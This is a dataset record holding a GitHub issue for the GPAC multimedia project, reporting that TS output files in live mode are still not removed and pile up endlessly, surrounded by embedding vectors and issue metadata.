0.02454630471765995, 0.012795237824320793, 0.016491271555423737, -0.004071023780852556, -0.0018366222502663732, 0.002301734173670411, -0.012927831150591373, 0.0000833239100757055, -0.005916968919336796, 0.008084038272500038, -0.007727694232016802, -0.004947381559759378, 0.014825570397078991, 0.007056441158056259, -0.023270096629858017, 0.0004252303624525666, 0.006637944374233484, -0.012472042813897133, 0.009322955273091793, 0.009936198592185974, -0.0059915524907410145, 0.01587802916765213, -0.004280272405594587, -0.009223510511219501, -0.003867990570142865 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Hi! At latest version 1.1.0-DEV-rev1769-g1d936f89d-master. I tested, but not fixed. When running #2122 - case-2, number of files grown infinitely. #2122 - At live mode "muxtype=ts" output file will not remove. - NOT FIXED Thanks. ----------------------- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [*] I looked for a similar issue and couldn't find any. - [*] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [*] I give enough information for contributors to reproduce my issue
#2122 - At live mode "muxtype=ts" output file will not remove. - NOT FIXED
https://api.github.com/repos/gpac/gpac/issues/2123/comments
1
2022-02-18T11:02:55
2022-02-18T12:44:26Z
https://github.com/gpac/gpac/issues/2123
1,142,850,357
2,123
false
This is a GitHub Issue repo:gpac owner:gpac Title : #2122 - At live mode "muxtype=ts" output file will not remove. - NOT FIXED Issue date: --- start body --- Hi! At latest version 1.1.0-DEV-rev1769-g1d936f89d-master. I tested, but not fixed. When running #2122 - case-2, number of files grown infinitely. #2122 - At live mode "muxtype=ts" output file will not remove. - NOT FIXED Thanks. ----------------------- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [*] I looked for a similar issue and couldn't find any. - [*] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [*] I give enough information for contributors to reproduce my issue --- end body ---
821
[ -0.01967734470963478, 0.03156890720129013, -0.01759403944015503, 0.027782464399933815, 0.007702144328504801, 0.044889893382787704, -0.042426422238349915, 0.06110013276338577, -0.006630078889429569, 0.026809241622686386, -0.008644954301416874, -0.010492555797100067, 0.004854707978665829, 0.0026079323142766953, -0.013784785754978657, 0.00265545304864645, -0.02863403409719467, 0.015997346490621567, 0.012127266265451908, -0.02408725954592228, 0.032116346061229706, 0.0019359906436875463, -0.014240983873605728, 0.013511067256331444, -0.017077015712857246, 0.015122966840863228, -0.024117672815918922, 0.005109418649226427, -0.008203962817788124, -0.020817840471863747, 0.007363797631114721, 0.03728659078478813, -0.004033551551401615, 0.0066718971356749535, 0.005231071263551712, 0.0034005765337496996, 0.07359995692968369, 0.07694540917873383, 0.008097516372799873, 0.00840164814144373, -0.011739498004317284, -0.03226841241121292, -0.044190388172864914, 0.025623125955462456, -0.019297178834676743, 0.05273649841547012, 0.000295815960271284, -0.000576900492887944, -0.03822939842939377, 0.004638013895601034, 0.0022961969953030348, -0.019722964614629745, -0.038381464779376984, -0.05015137791633606, -0.01719866879284382, -0.04060162976384163, 0.047839973121881485, -0.00035236551775597036, -0.01538908202201128, 0.030245933681726456, 0.016985775902867317, 0.00602181488648057, -0.023266103118658066, 0.04875237122178078, -0.0029785933438688517, -0.004850906319916248, -0.02173023670911789, 0.01690974272787571, -0.019190732389688492, 0.011283299885690212, -0.0157388336956501, -0.006006608251482248, -0.002742890967056155, -0.00875139981508255, 0.03086940385401249, -0.061890874058008194, 0.023159656673669815, 0.02221684716641903, 0.008143136277794838, 0.0027333868201822042, -0.044099148362874985, 0.021851887926459312, -0.015313048847019672, 0.008082309737801552, -0.008766606450080872, 0.032207585871219635, -0.05346641689538956, -0.06928128004074097, 0.007740160916000605, 0.010773878544569016, 0.01548032183200121, 0.024923622608184814, 0.01958610489964485, -0.034184444695711136, -0.0039575183764100075, 0.009975532069802284, -0.006253715604543686, 0.001442726468667388, -0.05063798651099205, -0.02693089470267296, -0.01987503096461296, -0.02478676289319992, 0.010925943963229656, -0.01316891796886921, 0.0001564616832183674, 0.003204791573807597, 0.0020718995947390795, 0.0009741730173118412, 0.033180806785821915, 0.10547299683094025, 0.0367695651948452, 0.023828746750950813, -0.010203630663454533, -0.011131233535706997, -0.006154872477054596, -0.0031344611197710037, -0.011792720295488834, -0.02004230208694935, -0.02446742355823517, 0.023524614050984383, 0.018567262217402458, -0.028451554477214813, -0.03412361815571785, 0.031021470203995705, -0.023965606465935707, 0.046076007187366486, -0.018749741837382317, 0.01917552575469017, -0.02192792110145092, -0.03166014701128006, -0.057298481464385986, -0.03409320488572121, -0.0041894190944731236, -0.02302279695868492, -0.0005545658059418201, -0.0354313850402832, -0.03162973374128342, 0.023342136293649673, -0.03892890363931656, -0.0008824581746011972, -0.0400846041738987, -0.03975006192922592, 0.053557656705379486, -0.020833047106862068, 0.0177156925201416, -0.013191727921366692, 0.013868422247469425, -0.02007271535694599, -0.005907765123993158, 0.04060162976384163, -0.003339750226587057, -0.02744791842997074, -0.0004055886238347739, 0.040175843983888626, -0.0029120645485818386, 0.009922308847308159, 0.002779006725177169, 0.01037850696593523, -0.0004611877666320652, -0.007033053785562515, -0.006360161583870649, -0.0192667655646801, 0.009564952924847603, -0.023448582738637924, -0.010667432099580765, -0.02417849935591221, 0.0314776673913002, 0.040753696113824844, 0.010918340645730495, 0.016970569267868996, -0.022156020626425743, 0.006113054230809212, 0.009861482307314873, 0.03162973374128342, -0.025912052020430565, -0.02712857909500599, 0.010302473790943623, 0.04531567543745041, 0.011739498004317284, 0.022551393136382103, -0.01008197758346796, -0.0077591692097485065, -0.010135200805962086, 0.005181650165468454, 0.04011501744389534, -0.013016852550208569, -0.003472808049991727, -0.03409320488572121, -0.012005613185465336, -0.042426422238349915, 0.008120326325297356, 0.03138642758131027, 0.03962840884923935, -0.04333882033824921, 0.012811562977731228, -0.0030489240307360888, -0.03175138682126999, -0.006052228156477213, 0.01170148141682148, 0.018856188282370567, -0.00949652399867773, -0.022764284163713455, -0.0194796584546566, -0.01392164546996355, -0.0265355221927166, 0.00636776490136981, -0.008021483197808266, 0.040662456303834915, 0.017670072615146637, -0.03415403142571449, -0.05072922632098198, -0.03305915370583534, 0.031508080661296844, 0.01671205647289753, -0.004953551106154919, 0.026109738275408745, -0.013404620811343193, 0.010355697013437748, -0.0022372715175151825, -0.005599831696599722, 0.024528250098228455, -0.02744791842997074, -0.005656856577843428, -0.022673044353723526, -0.014332223683595657, -0.01622544601559639, 0.003588758409023285, 0.005812724120914936, -0.0230075903236866, -0.011625448241829872, 0.05672062933444977, 0.007413219194859266, -0.023159656673669815, 0.0175027996301651, -0.0034119815099984407, 0.011427761986851692, -0.0008591730729676783, -0.01449949573725462, 0.02027040161192417, -0.020179161801934242, -0.010538175702095032, 0.06617913395166397, 0.0001091192607418634, 0.019646931439638138, 0.003031816566362977, 0.030017834156751633, 0.02311403676867485, 0.006565450690686703, -0.03883766382932663, 0.0019787591882050037, 0.008188756182789803, -0.0028911554254591465, 0.003299832809716463, -0.020498501136898994, -0.03999336436390877, 0.004284460563212633, 0.023950399830937386, 0.014583132229745388, -0.041361961513757706, -0.039202623069286346, -0.02280990406870842, -0.001847602310590446, -0.03926344960927963, -0.0023247094359248877, 0.0221256073564291, -0.018065445125102997, -0.007553880102932453, 0.022870730608701706, 0.022870730608701706, -0.013990074396133423, -0.018354369327425957, -0.0166208166629076, -0.018643295392394066, -0.0011271894909441471, -0.0036990062799304724, -0.02320527657866478, -0.022003954276442528, 0.021699823439121246, 0.032420478761196136, -0.0021289244759827852, -0.033180806785821915, 0.008143136277794838, -0.024801969528198242, -0.001732602366246283, 0.006432393100112677, 0.0152446199208498, 0.033789072185754776, 0.010766275227069855, -0.030915023759007454, -0.002250577323138714, 0.03263337165117264, -0.02144131064414978, -0.01818709820508957, 0.038290224969387054, 0.009314044378697872, 0.002712477929890156, -0.01652957685291767, -0.0014256190042942762, 0.0055960300378501415, 0.006527434568852186, -0.00592677341774106, 0.021061144769191742, 0.0347927063703537, -0.03786444291472435, -0.05006013810634613, -0.013746769167482853, -0.005740492604672909, -0.005599831696599722, -0.007409417536109686, -0.02693089470267296, 0.04926939308643341, -0.03579634428024292, -0.0278432909399271, -0.0040069399401545525, 0.008728589862585068, 0.0037883450277149677, 0.0293943639844656, -0.014142140746116638, -0.04707964137196541, 0.0013971066800877452, -0.003634378081187606, -0.021213211119174957, -0.016559990122914314, 0.004759666975587606, -0.020817840471863747, -0.014894867315888405, -0.0009447102202102542, 0.014301810413599014, -0.02723502553999424, 0.008234375156462193, -0.00008256710134446621, 0.013959662057459354, 0.004793881438672543, -0.005231071263551712, -0.013237347826361656, -0.039293862879276276, -0.007162310183048248, -0.008637350983917713, 0.015183793380856514, -0.026200976222753525, -0.030656510964035988, -0.014970900490880013, 0.03315039351582527, -0.014081314206123352, 0.010431729257106781, 0.008933879435062408, 0.0036780971568077803, 0.009002309292554855, 0.023235689848661423, -0.010606605559587479, 0.001057809335179627, -0.008538507856428623, -0.003930906765162945, 0.03415403142571449, 0.00866016000509262, 0.030063454061746597, -0.02055932767689228, -0.005029583815485239, 0.012446604669094086, -0.03208593279123306, -0.004295865539461374, -0.03088461048901081, 0.0422743558883667, 0.04917815327644348, 0.0014180156867951155, 0.015754040330648422, -0.04078410938382149, -0.013389414176344872, -0.013647926039993763, -0.0010264456504955888, -0.005649253260344267, 0.02115238457918167, -0.04041915014386177, 0.03391072526574135, -0.0073561943136155605, 0.018369575962424278, 0.024741142988204956, -0.00664148386567831, -0.0037275184877216816, -0.004090576432645321, -0.018734535202383995, 0.031812213361263275, 0.018065445125102997, -0.021106764674186707, -0.013009249232709408, 0.022399326786398888, -0.029941800981760025, -0.002273387275636196, -0.027660811319947243, -0.0223385002464056, -0.023828746750950813, 0.012841976247727871, -0.05240195244550705, -0.02528858184814453, -0.011473381891846657, 0.009207597933709621, -0.04200063645839691, -0.03108229674398899, 0.0027352876495569944, -0.053040631115436554, 0.02871006727218628, -0.012849579565227032, 0.02261221967637539, 0.03664791211485863, -0.026322629302740097, 0.029135851189494133, -0.007166111841797829, 0.05170245096087456, 0.01548792514950037, 0.0004649893962778151, 0.02419370599091053, 0.00895668938755989, -0.03153849393129349, -0.020133541896939278, 0.016590403392910957, 0.038594357669353485, 0.036739151924848557, -0.020924285054206848, -0.0352184921503067, 0.006964624393731356, 0.010127597488462925, -0.006478013005107641, -0.0030850395560264587, -0.0016337594715878367, 0.05662938952445984, 0.0007831400725990534, 0.020179161801934242, -0.013693545944988728, 0.004364294931292534, -0.03993254154920578, 0.04130113497376442, 0.002058593789115548, 0.010583795607089996, -0.02378312684595585, 0.006375368218868971, -0.027098165825009346, -0.018856188282370567, -0.04790079966187477, 0.005519996862858534, 0.01613420620560646, -0.014035694301128387, 0.003714212914928794, 0.03932427614927292, 0.03135601431131363, 0.022262467071413994, -0.034184444695711136, -0.05465253069996834, -0.05252360552549362, 0.023676680400967598, -0.002231569029390812, 0.031021470203995705, 0.07974343001842499, 0.021973541006445885, -0.043034687638282776, -0.006614872254431248, 0.0038890887517482042, 0.024543456733226776, -0.006443798076361418, 0.02192792110145092, -0.011199663393199444, -0.0007565285195596516, 0.02468031644821167, -0.018445609137415886, 0.021608583629131317, -0.0010055366437882185, -0.014005281031131744, -0.011275696568191051, -0.014834041707217693, 0.013936852104961872, -0.015259826555848122, -0.009108754806220531, 0.02005750872194767, -0.002685866318643093, 0.03175138682126999, -0.009686606004834175, 0.025349406525492668, -0.03254213184118271, -0.04829617217183113, -0.004242642316967249, -0.020513707771897316, -0.03439733758568764, -0.02694610133767128, 0.012469414621591568, 0.021684616804122925, -0.03336328640580177, -0.010196027345955372, -0.002087106229737401, -0.011382142081856728, -0.013587099500000477, -0.0010948753915727139, 0.0166208166629076, 0.01027966383844614, 0.020696187391877174, 0.006044624838978052, 0.023053210228681564, -0.012940819375216961, 0.023448582738637924, -0.021182797849178314, 0.004717848729342222, -0.028147421777248383, 0.026429075747728348, -0.004303468856960535, -0.018917014822363853, 0.00442512147128582, 0.0021213211584836245, -0.004124790895730257, 0.009435697458684444, 0.020924285054206848, -0.022870730608701706, -0.01788296550512314, -0.03451899066567421, 0.00012105881614843383, -0.015997346490621567, -0.027402298524975777, -0.008538507856428623, -0.016407925635576248, 0.010462142527103424, 0.021471723914146423, 0.05252360552549362, 0.021167591214179993, -0.011990406550467014, -0.009215201251208782, 0.0019844616763293743, 0.02203436754643917, -0.022657837718725204, -0.010477349162101746, -0.004273055586963892, -0.002425453159958124, 0.030124280601739883, -0.018962634727358818, -0.05139831826090813, -0.017654865980148315, -0.006439996417611837, 0.03451899066567421, 0.0037275184877216816, -0.01681850291788578, 0.005519996862858534, 0.013587099500000477, -0.011777513660490513, 0.020407261326909065, 0.0013980570947751403, 0.014879660680890083, -0.026489902287721634, 0.020909078419208527, -0.00752346683293581, 0.03497518599033356, -0.012606274336576462, 0.004588592331856489, 0.007493053562939167, -0.014043297618627548, -0.004588592331856489, -0.013199331238865852, 0.019297178834676743, 0.021471723914146423, -0.004809088073670864, 0.037408243864774704, 0.026581142097711563, 0.01115404348820448, -0.00486991461366415, 0.02959205023944378, -0.0010986770503222942, 0.0042084273882210255, 0.020909078419208527, -0.008538507856428623, -0.00718131847679615, -0.004679832141846418, 0.022186433896422386, -0.02230808697640896, -0.044494520872831345, 0.013853215612471104, 0.0047406586818397045, -0.0037446259520947933, 0.01027206052094698, 0.0014883462572470307, 0.02969849668443203, 0.021304450929164886, -0.004265452269464731, -0.005455368664115667, -0.04552856832742691, -0.02174544334411621, 0.033576179295778275, -0.01867370866239071, 0.00875900313258171, -0.003202890744432807, -0.015358668752014637, -0.020376848056912422, 0.02174544334411621, 0.007291566114872694, -0.00895668938755989, -0.0034081798512488604, -0.0026060317177325487, -0.005877352319657803, 0.023144450038671494, -0.01730511523783207, 0.025136515498161316, -0.009572556242346764, -0.021258831024169922, -0.02379833348095417, 0.04802245274186134, 0.009526937268674374, -0.014279000461101532, 0.047931212931871414, -0.02390477992594242, -0.04817451909184456, -0.02753915823996067, -0.00044384272769093513, -0.0006733674090355635, 0.0005645451601594687, -0.05821087583899498, 0.012431398034095764, 0.009374870918691158, 0.02023998834192753, 0.05988360196352005, 0.0027752050664275885, 0.013906438834965229, 0.017426766455173492, -0.008804623037576675, 0.014332223683595657, 0.009321647696197033, 0.009853878989815712, 0.044007908552885056, -0.030261140316724777, 0.03175138682126999, -0.050790052860975266, 0.008926276117563248, 0.025896845385432243, 0.0005555162206292152, -0.010424126870930195, 0.001307767815887928, -0.02115238457918167, -0.009808259084820747, 0.0025318993721157312, -0.0054971869103610516, -0.05489583685994148, -0.01946445181965828, 0.012811562977731228, 0.061799634248018265, -0.02998742088675499, -0.010857515037059784, -0.012682306580245495, -0.01602775976061821, 0.021213211119174957, -0.0030812378972768784, 0.022840317338705063, -0.017092222347855568, 0.025045275688171387, -0.0025851225946098566, 0.005318509414792061, 0.004607600625604391, 0.023159656673669815, -0.005048592109233141, -0.017837345600128174, 0.01391404215246439, 0.03135601431131363, 0.010059167630970478, -0.030428413301706314, 0.008576524443924427, 0.025045275688171387, 0.005067600402981043, -0.024041639640927315, -0.04041915014386177, -0.020087921991944313, 0.023053210228681564, -0.02557750605046749, 0.023083623498678207, 0.011792720295488834, 0.020726600661873817, -0.014925280585885048, -0.04011501744389534, 0.0330287404358387, -0.01937321200966835, -0.026140151545405388, 0.021882301196455956, -0.014636355452239513, -0.009207597933709621, -0.010462142527103424, 0.0053641293197870255, 0.005660657770931721, 0.0008981400169432163, -0.013290571048855782, -0.01937321200966835, -0.022885937243700027, 0.003723716828972101, 0.039385102689266205, 0.0005859294324181974, 0.012423794716596603, 0.006728922016918659, -0.01115404348820448, 0.015617181546986103, -0.011921976692974567, 0.022946763783693314, 0.016772883012890816, 0.006344954948872328, 0.013206934556365013, -0.020513707771897316, -0.006109252572059631, -0.0016575197223573923, -0.006010409910231829, 0.0219127144664526, -0.03333287313580513, -0.04087534919381142, 0.026322629302740097, -0.005166443530470133, -0.025136515498161316, -0.02469552308320999, 0.00006433105590986088, -0.01406610757112503, -0.011769910342991352, -0.0038263616152107716, 0.01712263561785221, 0.005656856577843428, 0.018065445125102997, -0.00680875638499856, -0.008485284633934498, 0.014324620366096497, -0.0018418998224660754, -0.029728909954428673, -0.02466510981321335, -0.02950081042945385, 0.0037978491745889187, -0.002108015352860093, -0.016468750312924385, 0.0023722301702946424, -0.030033040791749954, -0.014560322277247906, 0.011762307025492191, -0.008333218283951283, 0.017289908602833748, -0.008135532960295677, 0.01317652128636837, -0.03058047965168953, -0.014742801897227764, 0.0347927063703537, 0.00069712771801278, -0.03018510714173317, 0.01908428594470024, 0.0006324996356852353, -0.011838340200483799, -0.00323330401442945, 0.022460153326392174, 0.006957021076232195, 0.041453201323747635, -0.0057176826521754265, 0.008089913055300713, -0.0332416333258152, -0.018354369327425957, -0.005048592109233141, 0.010690242052078247, -0.029485603794455528, -0.005881153512746096, 0.0012269828002899885, 0.013792389072477818, 0.013115694746375084, -0.016970569267868996, -0.010591398924589157, 0.033789072185754776, 0.016255859285593033, -0.01624065265059471, 0.0157388336956501, -0.005626443307846785, 0.013123298063874245, -0.01788296550512314, 0.021806268021464348, -0.030945437029004097, -0.02331172302365303, 0.02773684449493885, 0.00904032588005066, -0.006033219862729311, 0.005892558488994837, 0.00949652399867773, 0.012469414621591568, 0.0016080982750281692, -0.035248905420303345, -0.027098165825009346, 0.02635304257273674, -0.00398032832890749, 0.0035279318690299988, -0.009793052449822426, -0.0061700791120529175, 0.005740492604672909, -0.039202623069286346, -0.011967596597969532, -0.03333287313580513, 0.031234363093972206, 0.026231389492750168, 0.0005702475900761783, 0.012089249677956104, 0.01538908202201128, 0.023859160020947456, 0.0045087579637765884, 0.010545779019594193, -0.03777320310473442, 0.020817840471863747, -0.05951864272356033, -0.03464064002037048, -0.018354369327425957, 0.029135851189494133, 0.0157388336956501, 0.0015900403959676623, 0.0018590071704238653, -0.03768196329474449, 0.020087921991944313, -0.01681850291788578, -0.017548419535160065, -0.02822345495223999, -0.028375521302223206, -0.013298174366354942, 0.014286603778600693, -0.0017487592995166779, 0.029668083414435387, -0.020817840471863747, -0.029029404744505882, 0.0183847825974226, -0.017563626170158386, 0.019890237599611282, 0.007747764233499765, 0.011815530247986317, -0.02419370599091053, -0.03965882211923599, 0.03187303990125656, -0.008318011648952961, 0.014172554016113281, 0.036526259034872055, -0.01037850696593523, 0.0175027996301651, -0.045285262167453766, -0.0050143771804869175, -0.0005208261427469552, 0.04300427436828613, 0.021973541006445885, -0.01371635589748621, 0.009260821156203747, -0.008432061411440372, -0.009420490823686123, 0.007702144328504801, 0.039597995579242706, 0.004550575744360685, -0.006668095476925373, -0.007321979384869337, 0.026885274797677994, -0.021471723914146423, -0.013533877208828926, 0.001528263557702303, -0.027797671034932137, 0.0029082628898322582, -0.004573385696858168, -0.014172554016113281, -0.005002972204238176, -0.012066439725458622, -0.009169581346213818, 0.01748759299516678, 0.04592394083738327, 0.04276096820831299, 0.018171891570091248, -0.025136515498161316, 0.013997677713632584, 0.013754372484982014, 0.021167591214179993, 0.03749948367476463, -0.020422467961907387, 0.017852552235126495, 0.00004654052099795081, -0.01115404348820448, -0.020285608246922493, 0.01406610757112503, 0.031720973551273346, 0.000576900492887944, -0.04443369433283806, 0.0031135519966483116, 0.030215520411729813, -0.0519457571208477, -0.0427001416683197, -0.01558676827698946, 0.010363300330936909, 0.002393139060586691, 0.005147435236722231, -0.02311403676867485, -0.033880311995744705, -0.0014028091682121158, -0.007409417536109686, 0.010028754360973835, 0.022977177053689957, 0.00009801131091080606, 0.005352724343538284, -0.013868422247469425, 0.005329914391040802, -0.012956026010215282, -0.02201916091144085, 0.006094046402722597, -0.008097516372799873, 0.0038263616152107716, 0.02241453342139721, -0.023539820685982704, -0.0028341305442154408, -0.020574534311890602, 0.03470146656036377, 0.0007147103315219283, -0.05687269568443298, -0.0053451210260391235, -0.03009386733174324, -0.016407925635576248, 0.005155038554221392, -0.006253715604543686, 0.014560322277247906, -0.03451899066567421, -0.027599984779953957, 0.018825775012373924, -0.007846606895327568, -0.02144131064414978, -0.00036638410529121757, 0.008044293150305748, 0.011290903203189373, 0.0032485106494277716, -0.03825981169939041, -0.010355697013437748, -0.033089566975831985, -0.03537055850028992, -0.0002846485876943916, -0.014393050223588943, 0.05583864822983742, -0.01671205647289753, -0.007781979162245989, -0.007937846705317497, 0.036617498844861984, -0.009572556242346764, -0.008530904538929462, -0.008470077998936176, -0.010500159114599228, 0.017776519060134888, 0.006915202829986811, 0.004501154646277428, -0.0030945437029004097, 0.003560245968401432, 0.004839501343667507, 0.03944592922925949, 0.005957186687737703, 0.003012808272615075, 0.014347430318593979, 0.016559990122914314, -0.026216182857751846, -0.00084159045945853, 0.04893484711647034, -0.01140495203435421, -0.024756349623203278, -0.027980148792266846, 0.021608583629131317, -0.0036134689580649137, -0.012248918414115906, -0.029850561171770096, -0.01906908117234707, -0.00020505153224803507, 0.019038667902350426, -0.008470077998936176, -0.016058173030614853, -0.04437286779284477, 0.014423463493585587, -0.027767257764935493, -0.025790398940443993, 0.01139734871685505, 0.028345108032226562, -0.007280161138623953, 0.011222473345696926, 0.0066224755719304085, -0.015313048847019672, -0.010849911719560623, 0.04482906684279442, -0.032420478761196136, 0.03558345139026642, -0.0064704096876084805, 0.0006130161928012967, -0.030915023759007454, -0.012446604669094086, 0.01327536441385746, 0.028253868222236633, -0.02194312773644924, 0.024619489908218384, -0.026429075747728348, -0.018643295392394066, -0.015176190063357353, -0.03686080500483513, 0.02458907663822174, -0.014567925594747066, 0.03886807709932327, -0.04221352934837341, -0.009207597933709621, 0.014674372039735317, -0.016757676377892494, 0.010287267155945301, 0.017776519060134888, 0.00204148655757308, -0.02182147465646267, 0.03607006371021271, 0.02084825374186039, -0.017548419535160065, 0.0010986770503222942, -0.006793549750000238, 0.020817840471863747, -0.031599320471286774, -0.04130113497376442, -0.005801319144666195, -0.028877338394522667, 0.005911566782742739, -0.022840317338705063, 0.012446604669094086, 0.006132062524557114, -0.007751565892249346, -0.01987503096461296, -0.0033245435915887356, -0.011762307025492191, 0.028846926987171173, -0.021319657564163208, -0.0024482631124556065, -0.008097516372799873, -0.001664172625169158, -0.006329748313874006, 0.003499419428408146, -0.00840164814144373, -0.009222804568707943, 0.030823783949017525, 0.0312647745013237, -0.002155536087229848, -0.00779338413849473, 0.00046332619967870414, -0.00929123442620039, 0.023615853860974312, 0.022764284163713455, -0.017730899155139923, 0.001116734929382801, -0.0014598339330404997, 0.022475359961390495, 0.005987599957734346, 0.0072269379161298275, 0.017168255522847176, 0.041057828813791275, -0.000025883895432343706, -0.027615191414952278, 0.008964292705059052, -0.0014569826889783144, 0.0010521068470552564, -0.029683290049433708, 0.022673044353723526, -0.013807595707476139, -0.0383206382393837, -0.025805605575442314, 0.008652557618916035, -0.010059167630970478, 0.0015852883225306869, 0.03704328462481499, 0.015518338419497013, 0.010363300330936909, 0.01741155982017517, 0.002412147354334593, 0.0748773142695427, -0.036252543330192566, -0.023859160020947456, 0.000029121238185325637, -0.016179826110601425, -0.0027847092133015394, 0.02282511070370674, 0.009876688942313194, -0.015160983428359032, -0.03725617751479149, 0.01741155982017517, 0.010355697013437748, -0.011306109838187695, -0.01887139491736889, 0.00045596048585139215, 0.015571561641991138, -0.004098179750144482, 0.003972725011408329, 0.012165282852947712, 0.005443963687866926, -0.01071305200457573, 0.0031420644372701645, -0.005957186687737703, -0.009709415957331657, 0.007660326082259417, -0.014202967286109924, -0.0009508879156783223, 0.018263129517436028, 0.0011861150851473212, -0.01642313040792942, 0.020604947581887245, -0.013663132674992085, -0.058971207588911057, 0.004550575744360685, -0.0071737151592969894, 0.005124625284224749, -0.00042578487773425877, -0.00821156520396471, -0.011572225019335747, 0.0023228086065500975, -0.0036419813986867666, -0.017274701967835426, 0.008584127761423588, -0.022262467071413994, 0.003655287204310298, 0.06982871890068054, 0.016742469742894173, -0.019008254632353783, -0.014370240271091461, -0.005386939272284508, -0.012568257749080658, -0.007493053562939167, 0.022961970418691635, 0.0000940908576012589, -0.017533212900161743, 0.006569252349436283, -0.0033435518853366375, -0.0018048336496576667, -0.004896526224911213, -0.00469503877684474, -0.015617181546986103, -0.006744128651916981, -0.01105520036071539, -0.010142804123461246, 0.00041200389387086034, -0.009709415957331657, 0.004717848729342222, 0.024938829243183136, 8.130483593049576e-7, -0.0013533877208828926, -0.030747750774025917, 0.021000318229198456, 0.017441973090171814, -0.026489902287721634, -0.0078085907734930515, 0.009443300776183605, -0.009952722117304802, -0.005348922684788704, -0.006409583147615194, 0.01018082071095705, 0.02871006727218628, 0.03956758230924606, 0.0005341319483704865, -0.014742801897227764, -0.010849911719560623, 0.013351397588849068, 0.01966213807463646, -0.004090576432645321, -0.038776837289333344, -0.00761850830167532, 0.0026820646598935127, 0.04151402786374092, -0.00910115148872137, -0.004858509637415409, -0.01337420754134655, -0.014050900936126709, -0.006964624393731356, 0.0035279318690299988, 0.017472386360168457, -0.009656192734837532, 0.00585454236716032, 0.003339750226587057, -0.008553714491426945, 0.005105616990476847, -0.0009836771059781313, 0.0046418155543506145, 0.019981475546956062, -0.005352724343538284, 0.017046602442860603, -0.0014788421103730798, -0.0038339646998792887, -0.01878015510737896, 0.015358668752014637, -0.0007864665240049362, -0.0027010729536414146, 0.037317004054784775, -0.020878665149211884, -0.011975199915468693, -0.0019283873261883855, 0.008386441506445408, 0.03944592922925949, -0.028983784839510918, -0.0008434912888333201, -0.021775854751467705, -0.0003381093265488744, 0.022156020626425743, 0.028953371569514275, -0.03162973374128342, 0.0048623112961649895, 0.0028816512785851955, -0.008416854776442051, 0.008523301221430302, -0.007344789337366819, -0.00028132216539233923, -0.013222141191363335, -0.005459170322865248, 0.002510990248993039, 0.026687588542699814, 0.011883960105478764, -0.004299667198210955, 0.01899304799735546, 0.019038667902350426, -0.027478331699967384, 0.0006776442751288414, -0.021715030074119568, 0.007329582702368498, 0.006713715381920338, 0.01613420620560646, 0.006580657325685024, -0.011959993280470371, 0.002676362171769142, -0.014636355452239513, 0.026003291830420494, 0.002085205400362611, -0.014872057363390923, -0.02183668129146099, -0.01958610489964485, -0.0032180973794311285, -0.03099105693399906, -0.011731894686818123, -0.023174863308668137, -0.009131564758718014, 0.004307270515710115, 0.00415140250697732, -0.025136515498161316, -0.015328255482017994, -0.001963552553206682, 0.02604891173541546, 0.000606363289989531, 0.003560245968401432, 0.010089580900967121, -0.025349406525492668, -0.017183462157845497, 0.024543456733226776, 0.016088586300611496, 0.01888660155236721, 0.011389745399355888, -0.014879660680890083, 0.008105119690299034, 0.028786100447177887, -0.01651437021791935, 0.03628295660018921, -0.008926276117563248, 0.0036134689580649137, 0.010530572384595871, 0.004094378091394901, 0.0495431125164032, 0.0007565285195596516, 0.018917014822363853, 0.018567262217402458, -0.007721152622252703, -0.006230905652046204, 0.0006814458756707609, 0.0071052853018045425, 0.037012871354818344, 0.006447599735110998, 0.0016461147461086512, 0.0008515697554685175, 0.016453543677926064, 0.014567925594747066, -0.002089007059112191, 0.02194312773644924, -0.013457844033837318, -0.004504956305027008, 0.010150407440960407, -0.003946113400161266, -0.003066031262278557, 0.01739635318517685, -0.0024311556480824947, 0.019388418644666672, 0.01730511523783207, -0.006945616099983454, -0.07104524970054626, -0.015107760205864906, 0.014453875832259655, 0.008432061411440372, 0.009785449132323265, -0.013868422247469425, -0.016255859285593033, -0.002299998654052615, 0.005858344025909901, -0.023250896483659744, 0.014088917523622513, 0.015769246965646744, -0.012248918414115906, -0.008873052895069122, 0.01748759299516678, -0.01583007350564003, -0.032207585871219635, 0.04443369433283806, -0.009154374711215496, 0.005360327661037445, -0.00939007755368948, -0.0032561139669269323, -0.0053641293197870255, 0.008895862847566605, 0.022870730608701706, -0.01887139491736889, -0.007584293372929096, -0.009359664283692837, -0.010979167185723782, 0.007641318254172802, 0.0015643793158233166, 0.0072041284292936325, 0.010979167185723782, 0.0026497505605220795, -0.011906770057976246, 0.012788753025233746, 0.0014826437691226602, 0.015541148371994495, -0.027280645444989204, 0.0012726025888696313, 0.01346544735133648, -0.012355364859104156, -0.009876688942313194, 0.008485284633934498, 0.005174046847969294, 0.008553714491426945, -0.01151139847934246, 0.016407925635576248, 0.01887139491736889, 0.0026402464136481285, -0.0033055352978408337, -0.00663388054817915, -0.0013134703040122986, -0.0058165257796645164, 0.007382805924862623, -0.010804291814565659, 0.006356359925121069, -0.009770242497324944, -0.006979831028729677, 0.03658708557486534, 0.0007693590596318245, -0.01690974272787571, 0.016286272555589676, -0.014514702372252941, -0.01061420887708664, 0.028040975332260132, -0.009336854331195354, 0.012803959660232067, -0.0006938012666068971, 0.004101981408894062, -0.013632719404995441, 0.009336854331195354, -0.009701812639832497, 0.018126271665096283, -0.005261484533548355, -0.012340158224105835, 0.005561815109103918, -0.017168255522847176, -0.00014909598394297063, 0.007930243387818336, 0.034853532910346985, -0.00030104321194812655, -0.0012545447098091245, -0.01450709905475378, 0.009557349607348442, 0.011754704639315605, 0.014035694301128387, 0.006888591218739748, 0.0037009071093052626, 0.0014579331036657095, -0.016666436567902565, 0.010667432099580765, -0.016255859285593033, 0.02860362082719803, -0.024528250098228455, -0.005341319367289543, -0.00238553574308753, -0.006896194536238909, 0.05720724165439606, -0.007991069927811623, 0.0006629128474742174, -0.01642313040792942, 0.006713715381920338, -0.0034309898037463427, 0.005462971981614828, 0.013199331238865852, 0.007223136257380247, -0.02007271535694599, 0.0026801638305187225, -0.015784453600645065, -0.026885274797677994, -0.01928197219967842, 0.01008197758346796, 0.0015434701927006245, 0.03610047698020935, 0.004622807260602713, -0.020787427201867104, -0.030230727046728134, 0.00993751548230648, 0.00861454103142023, 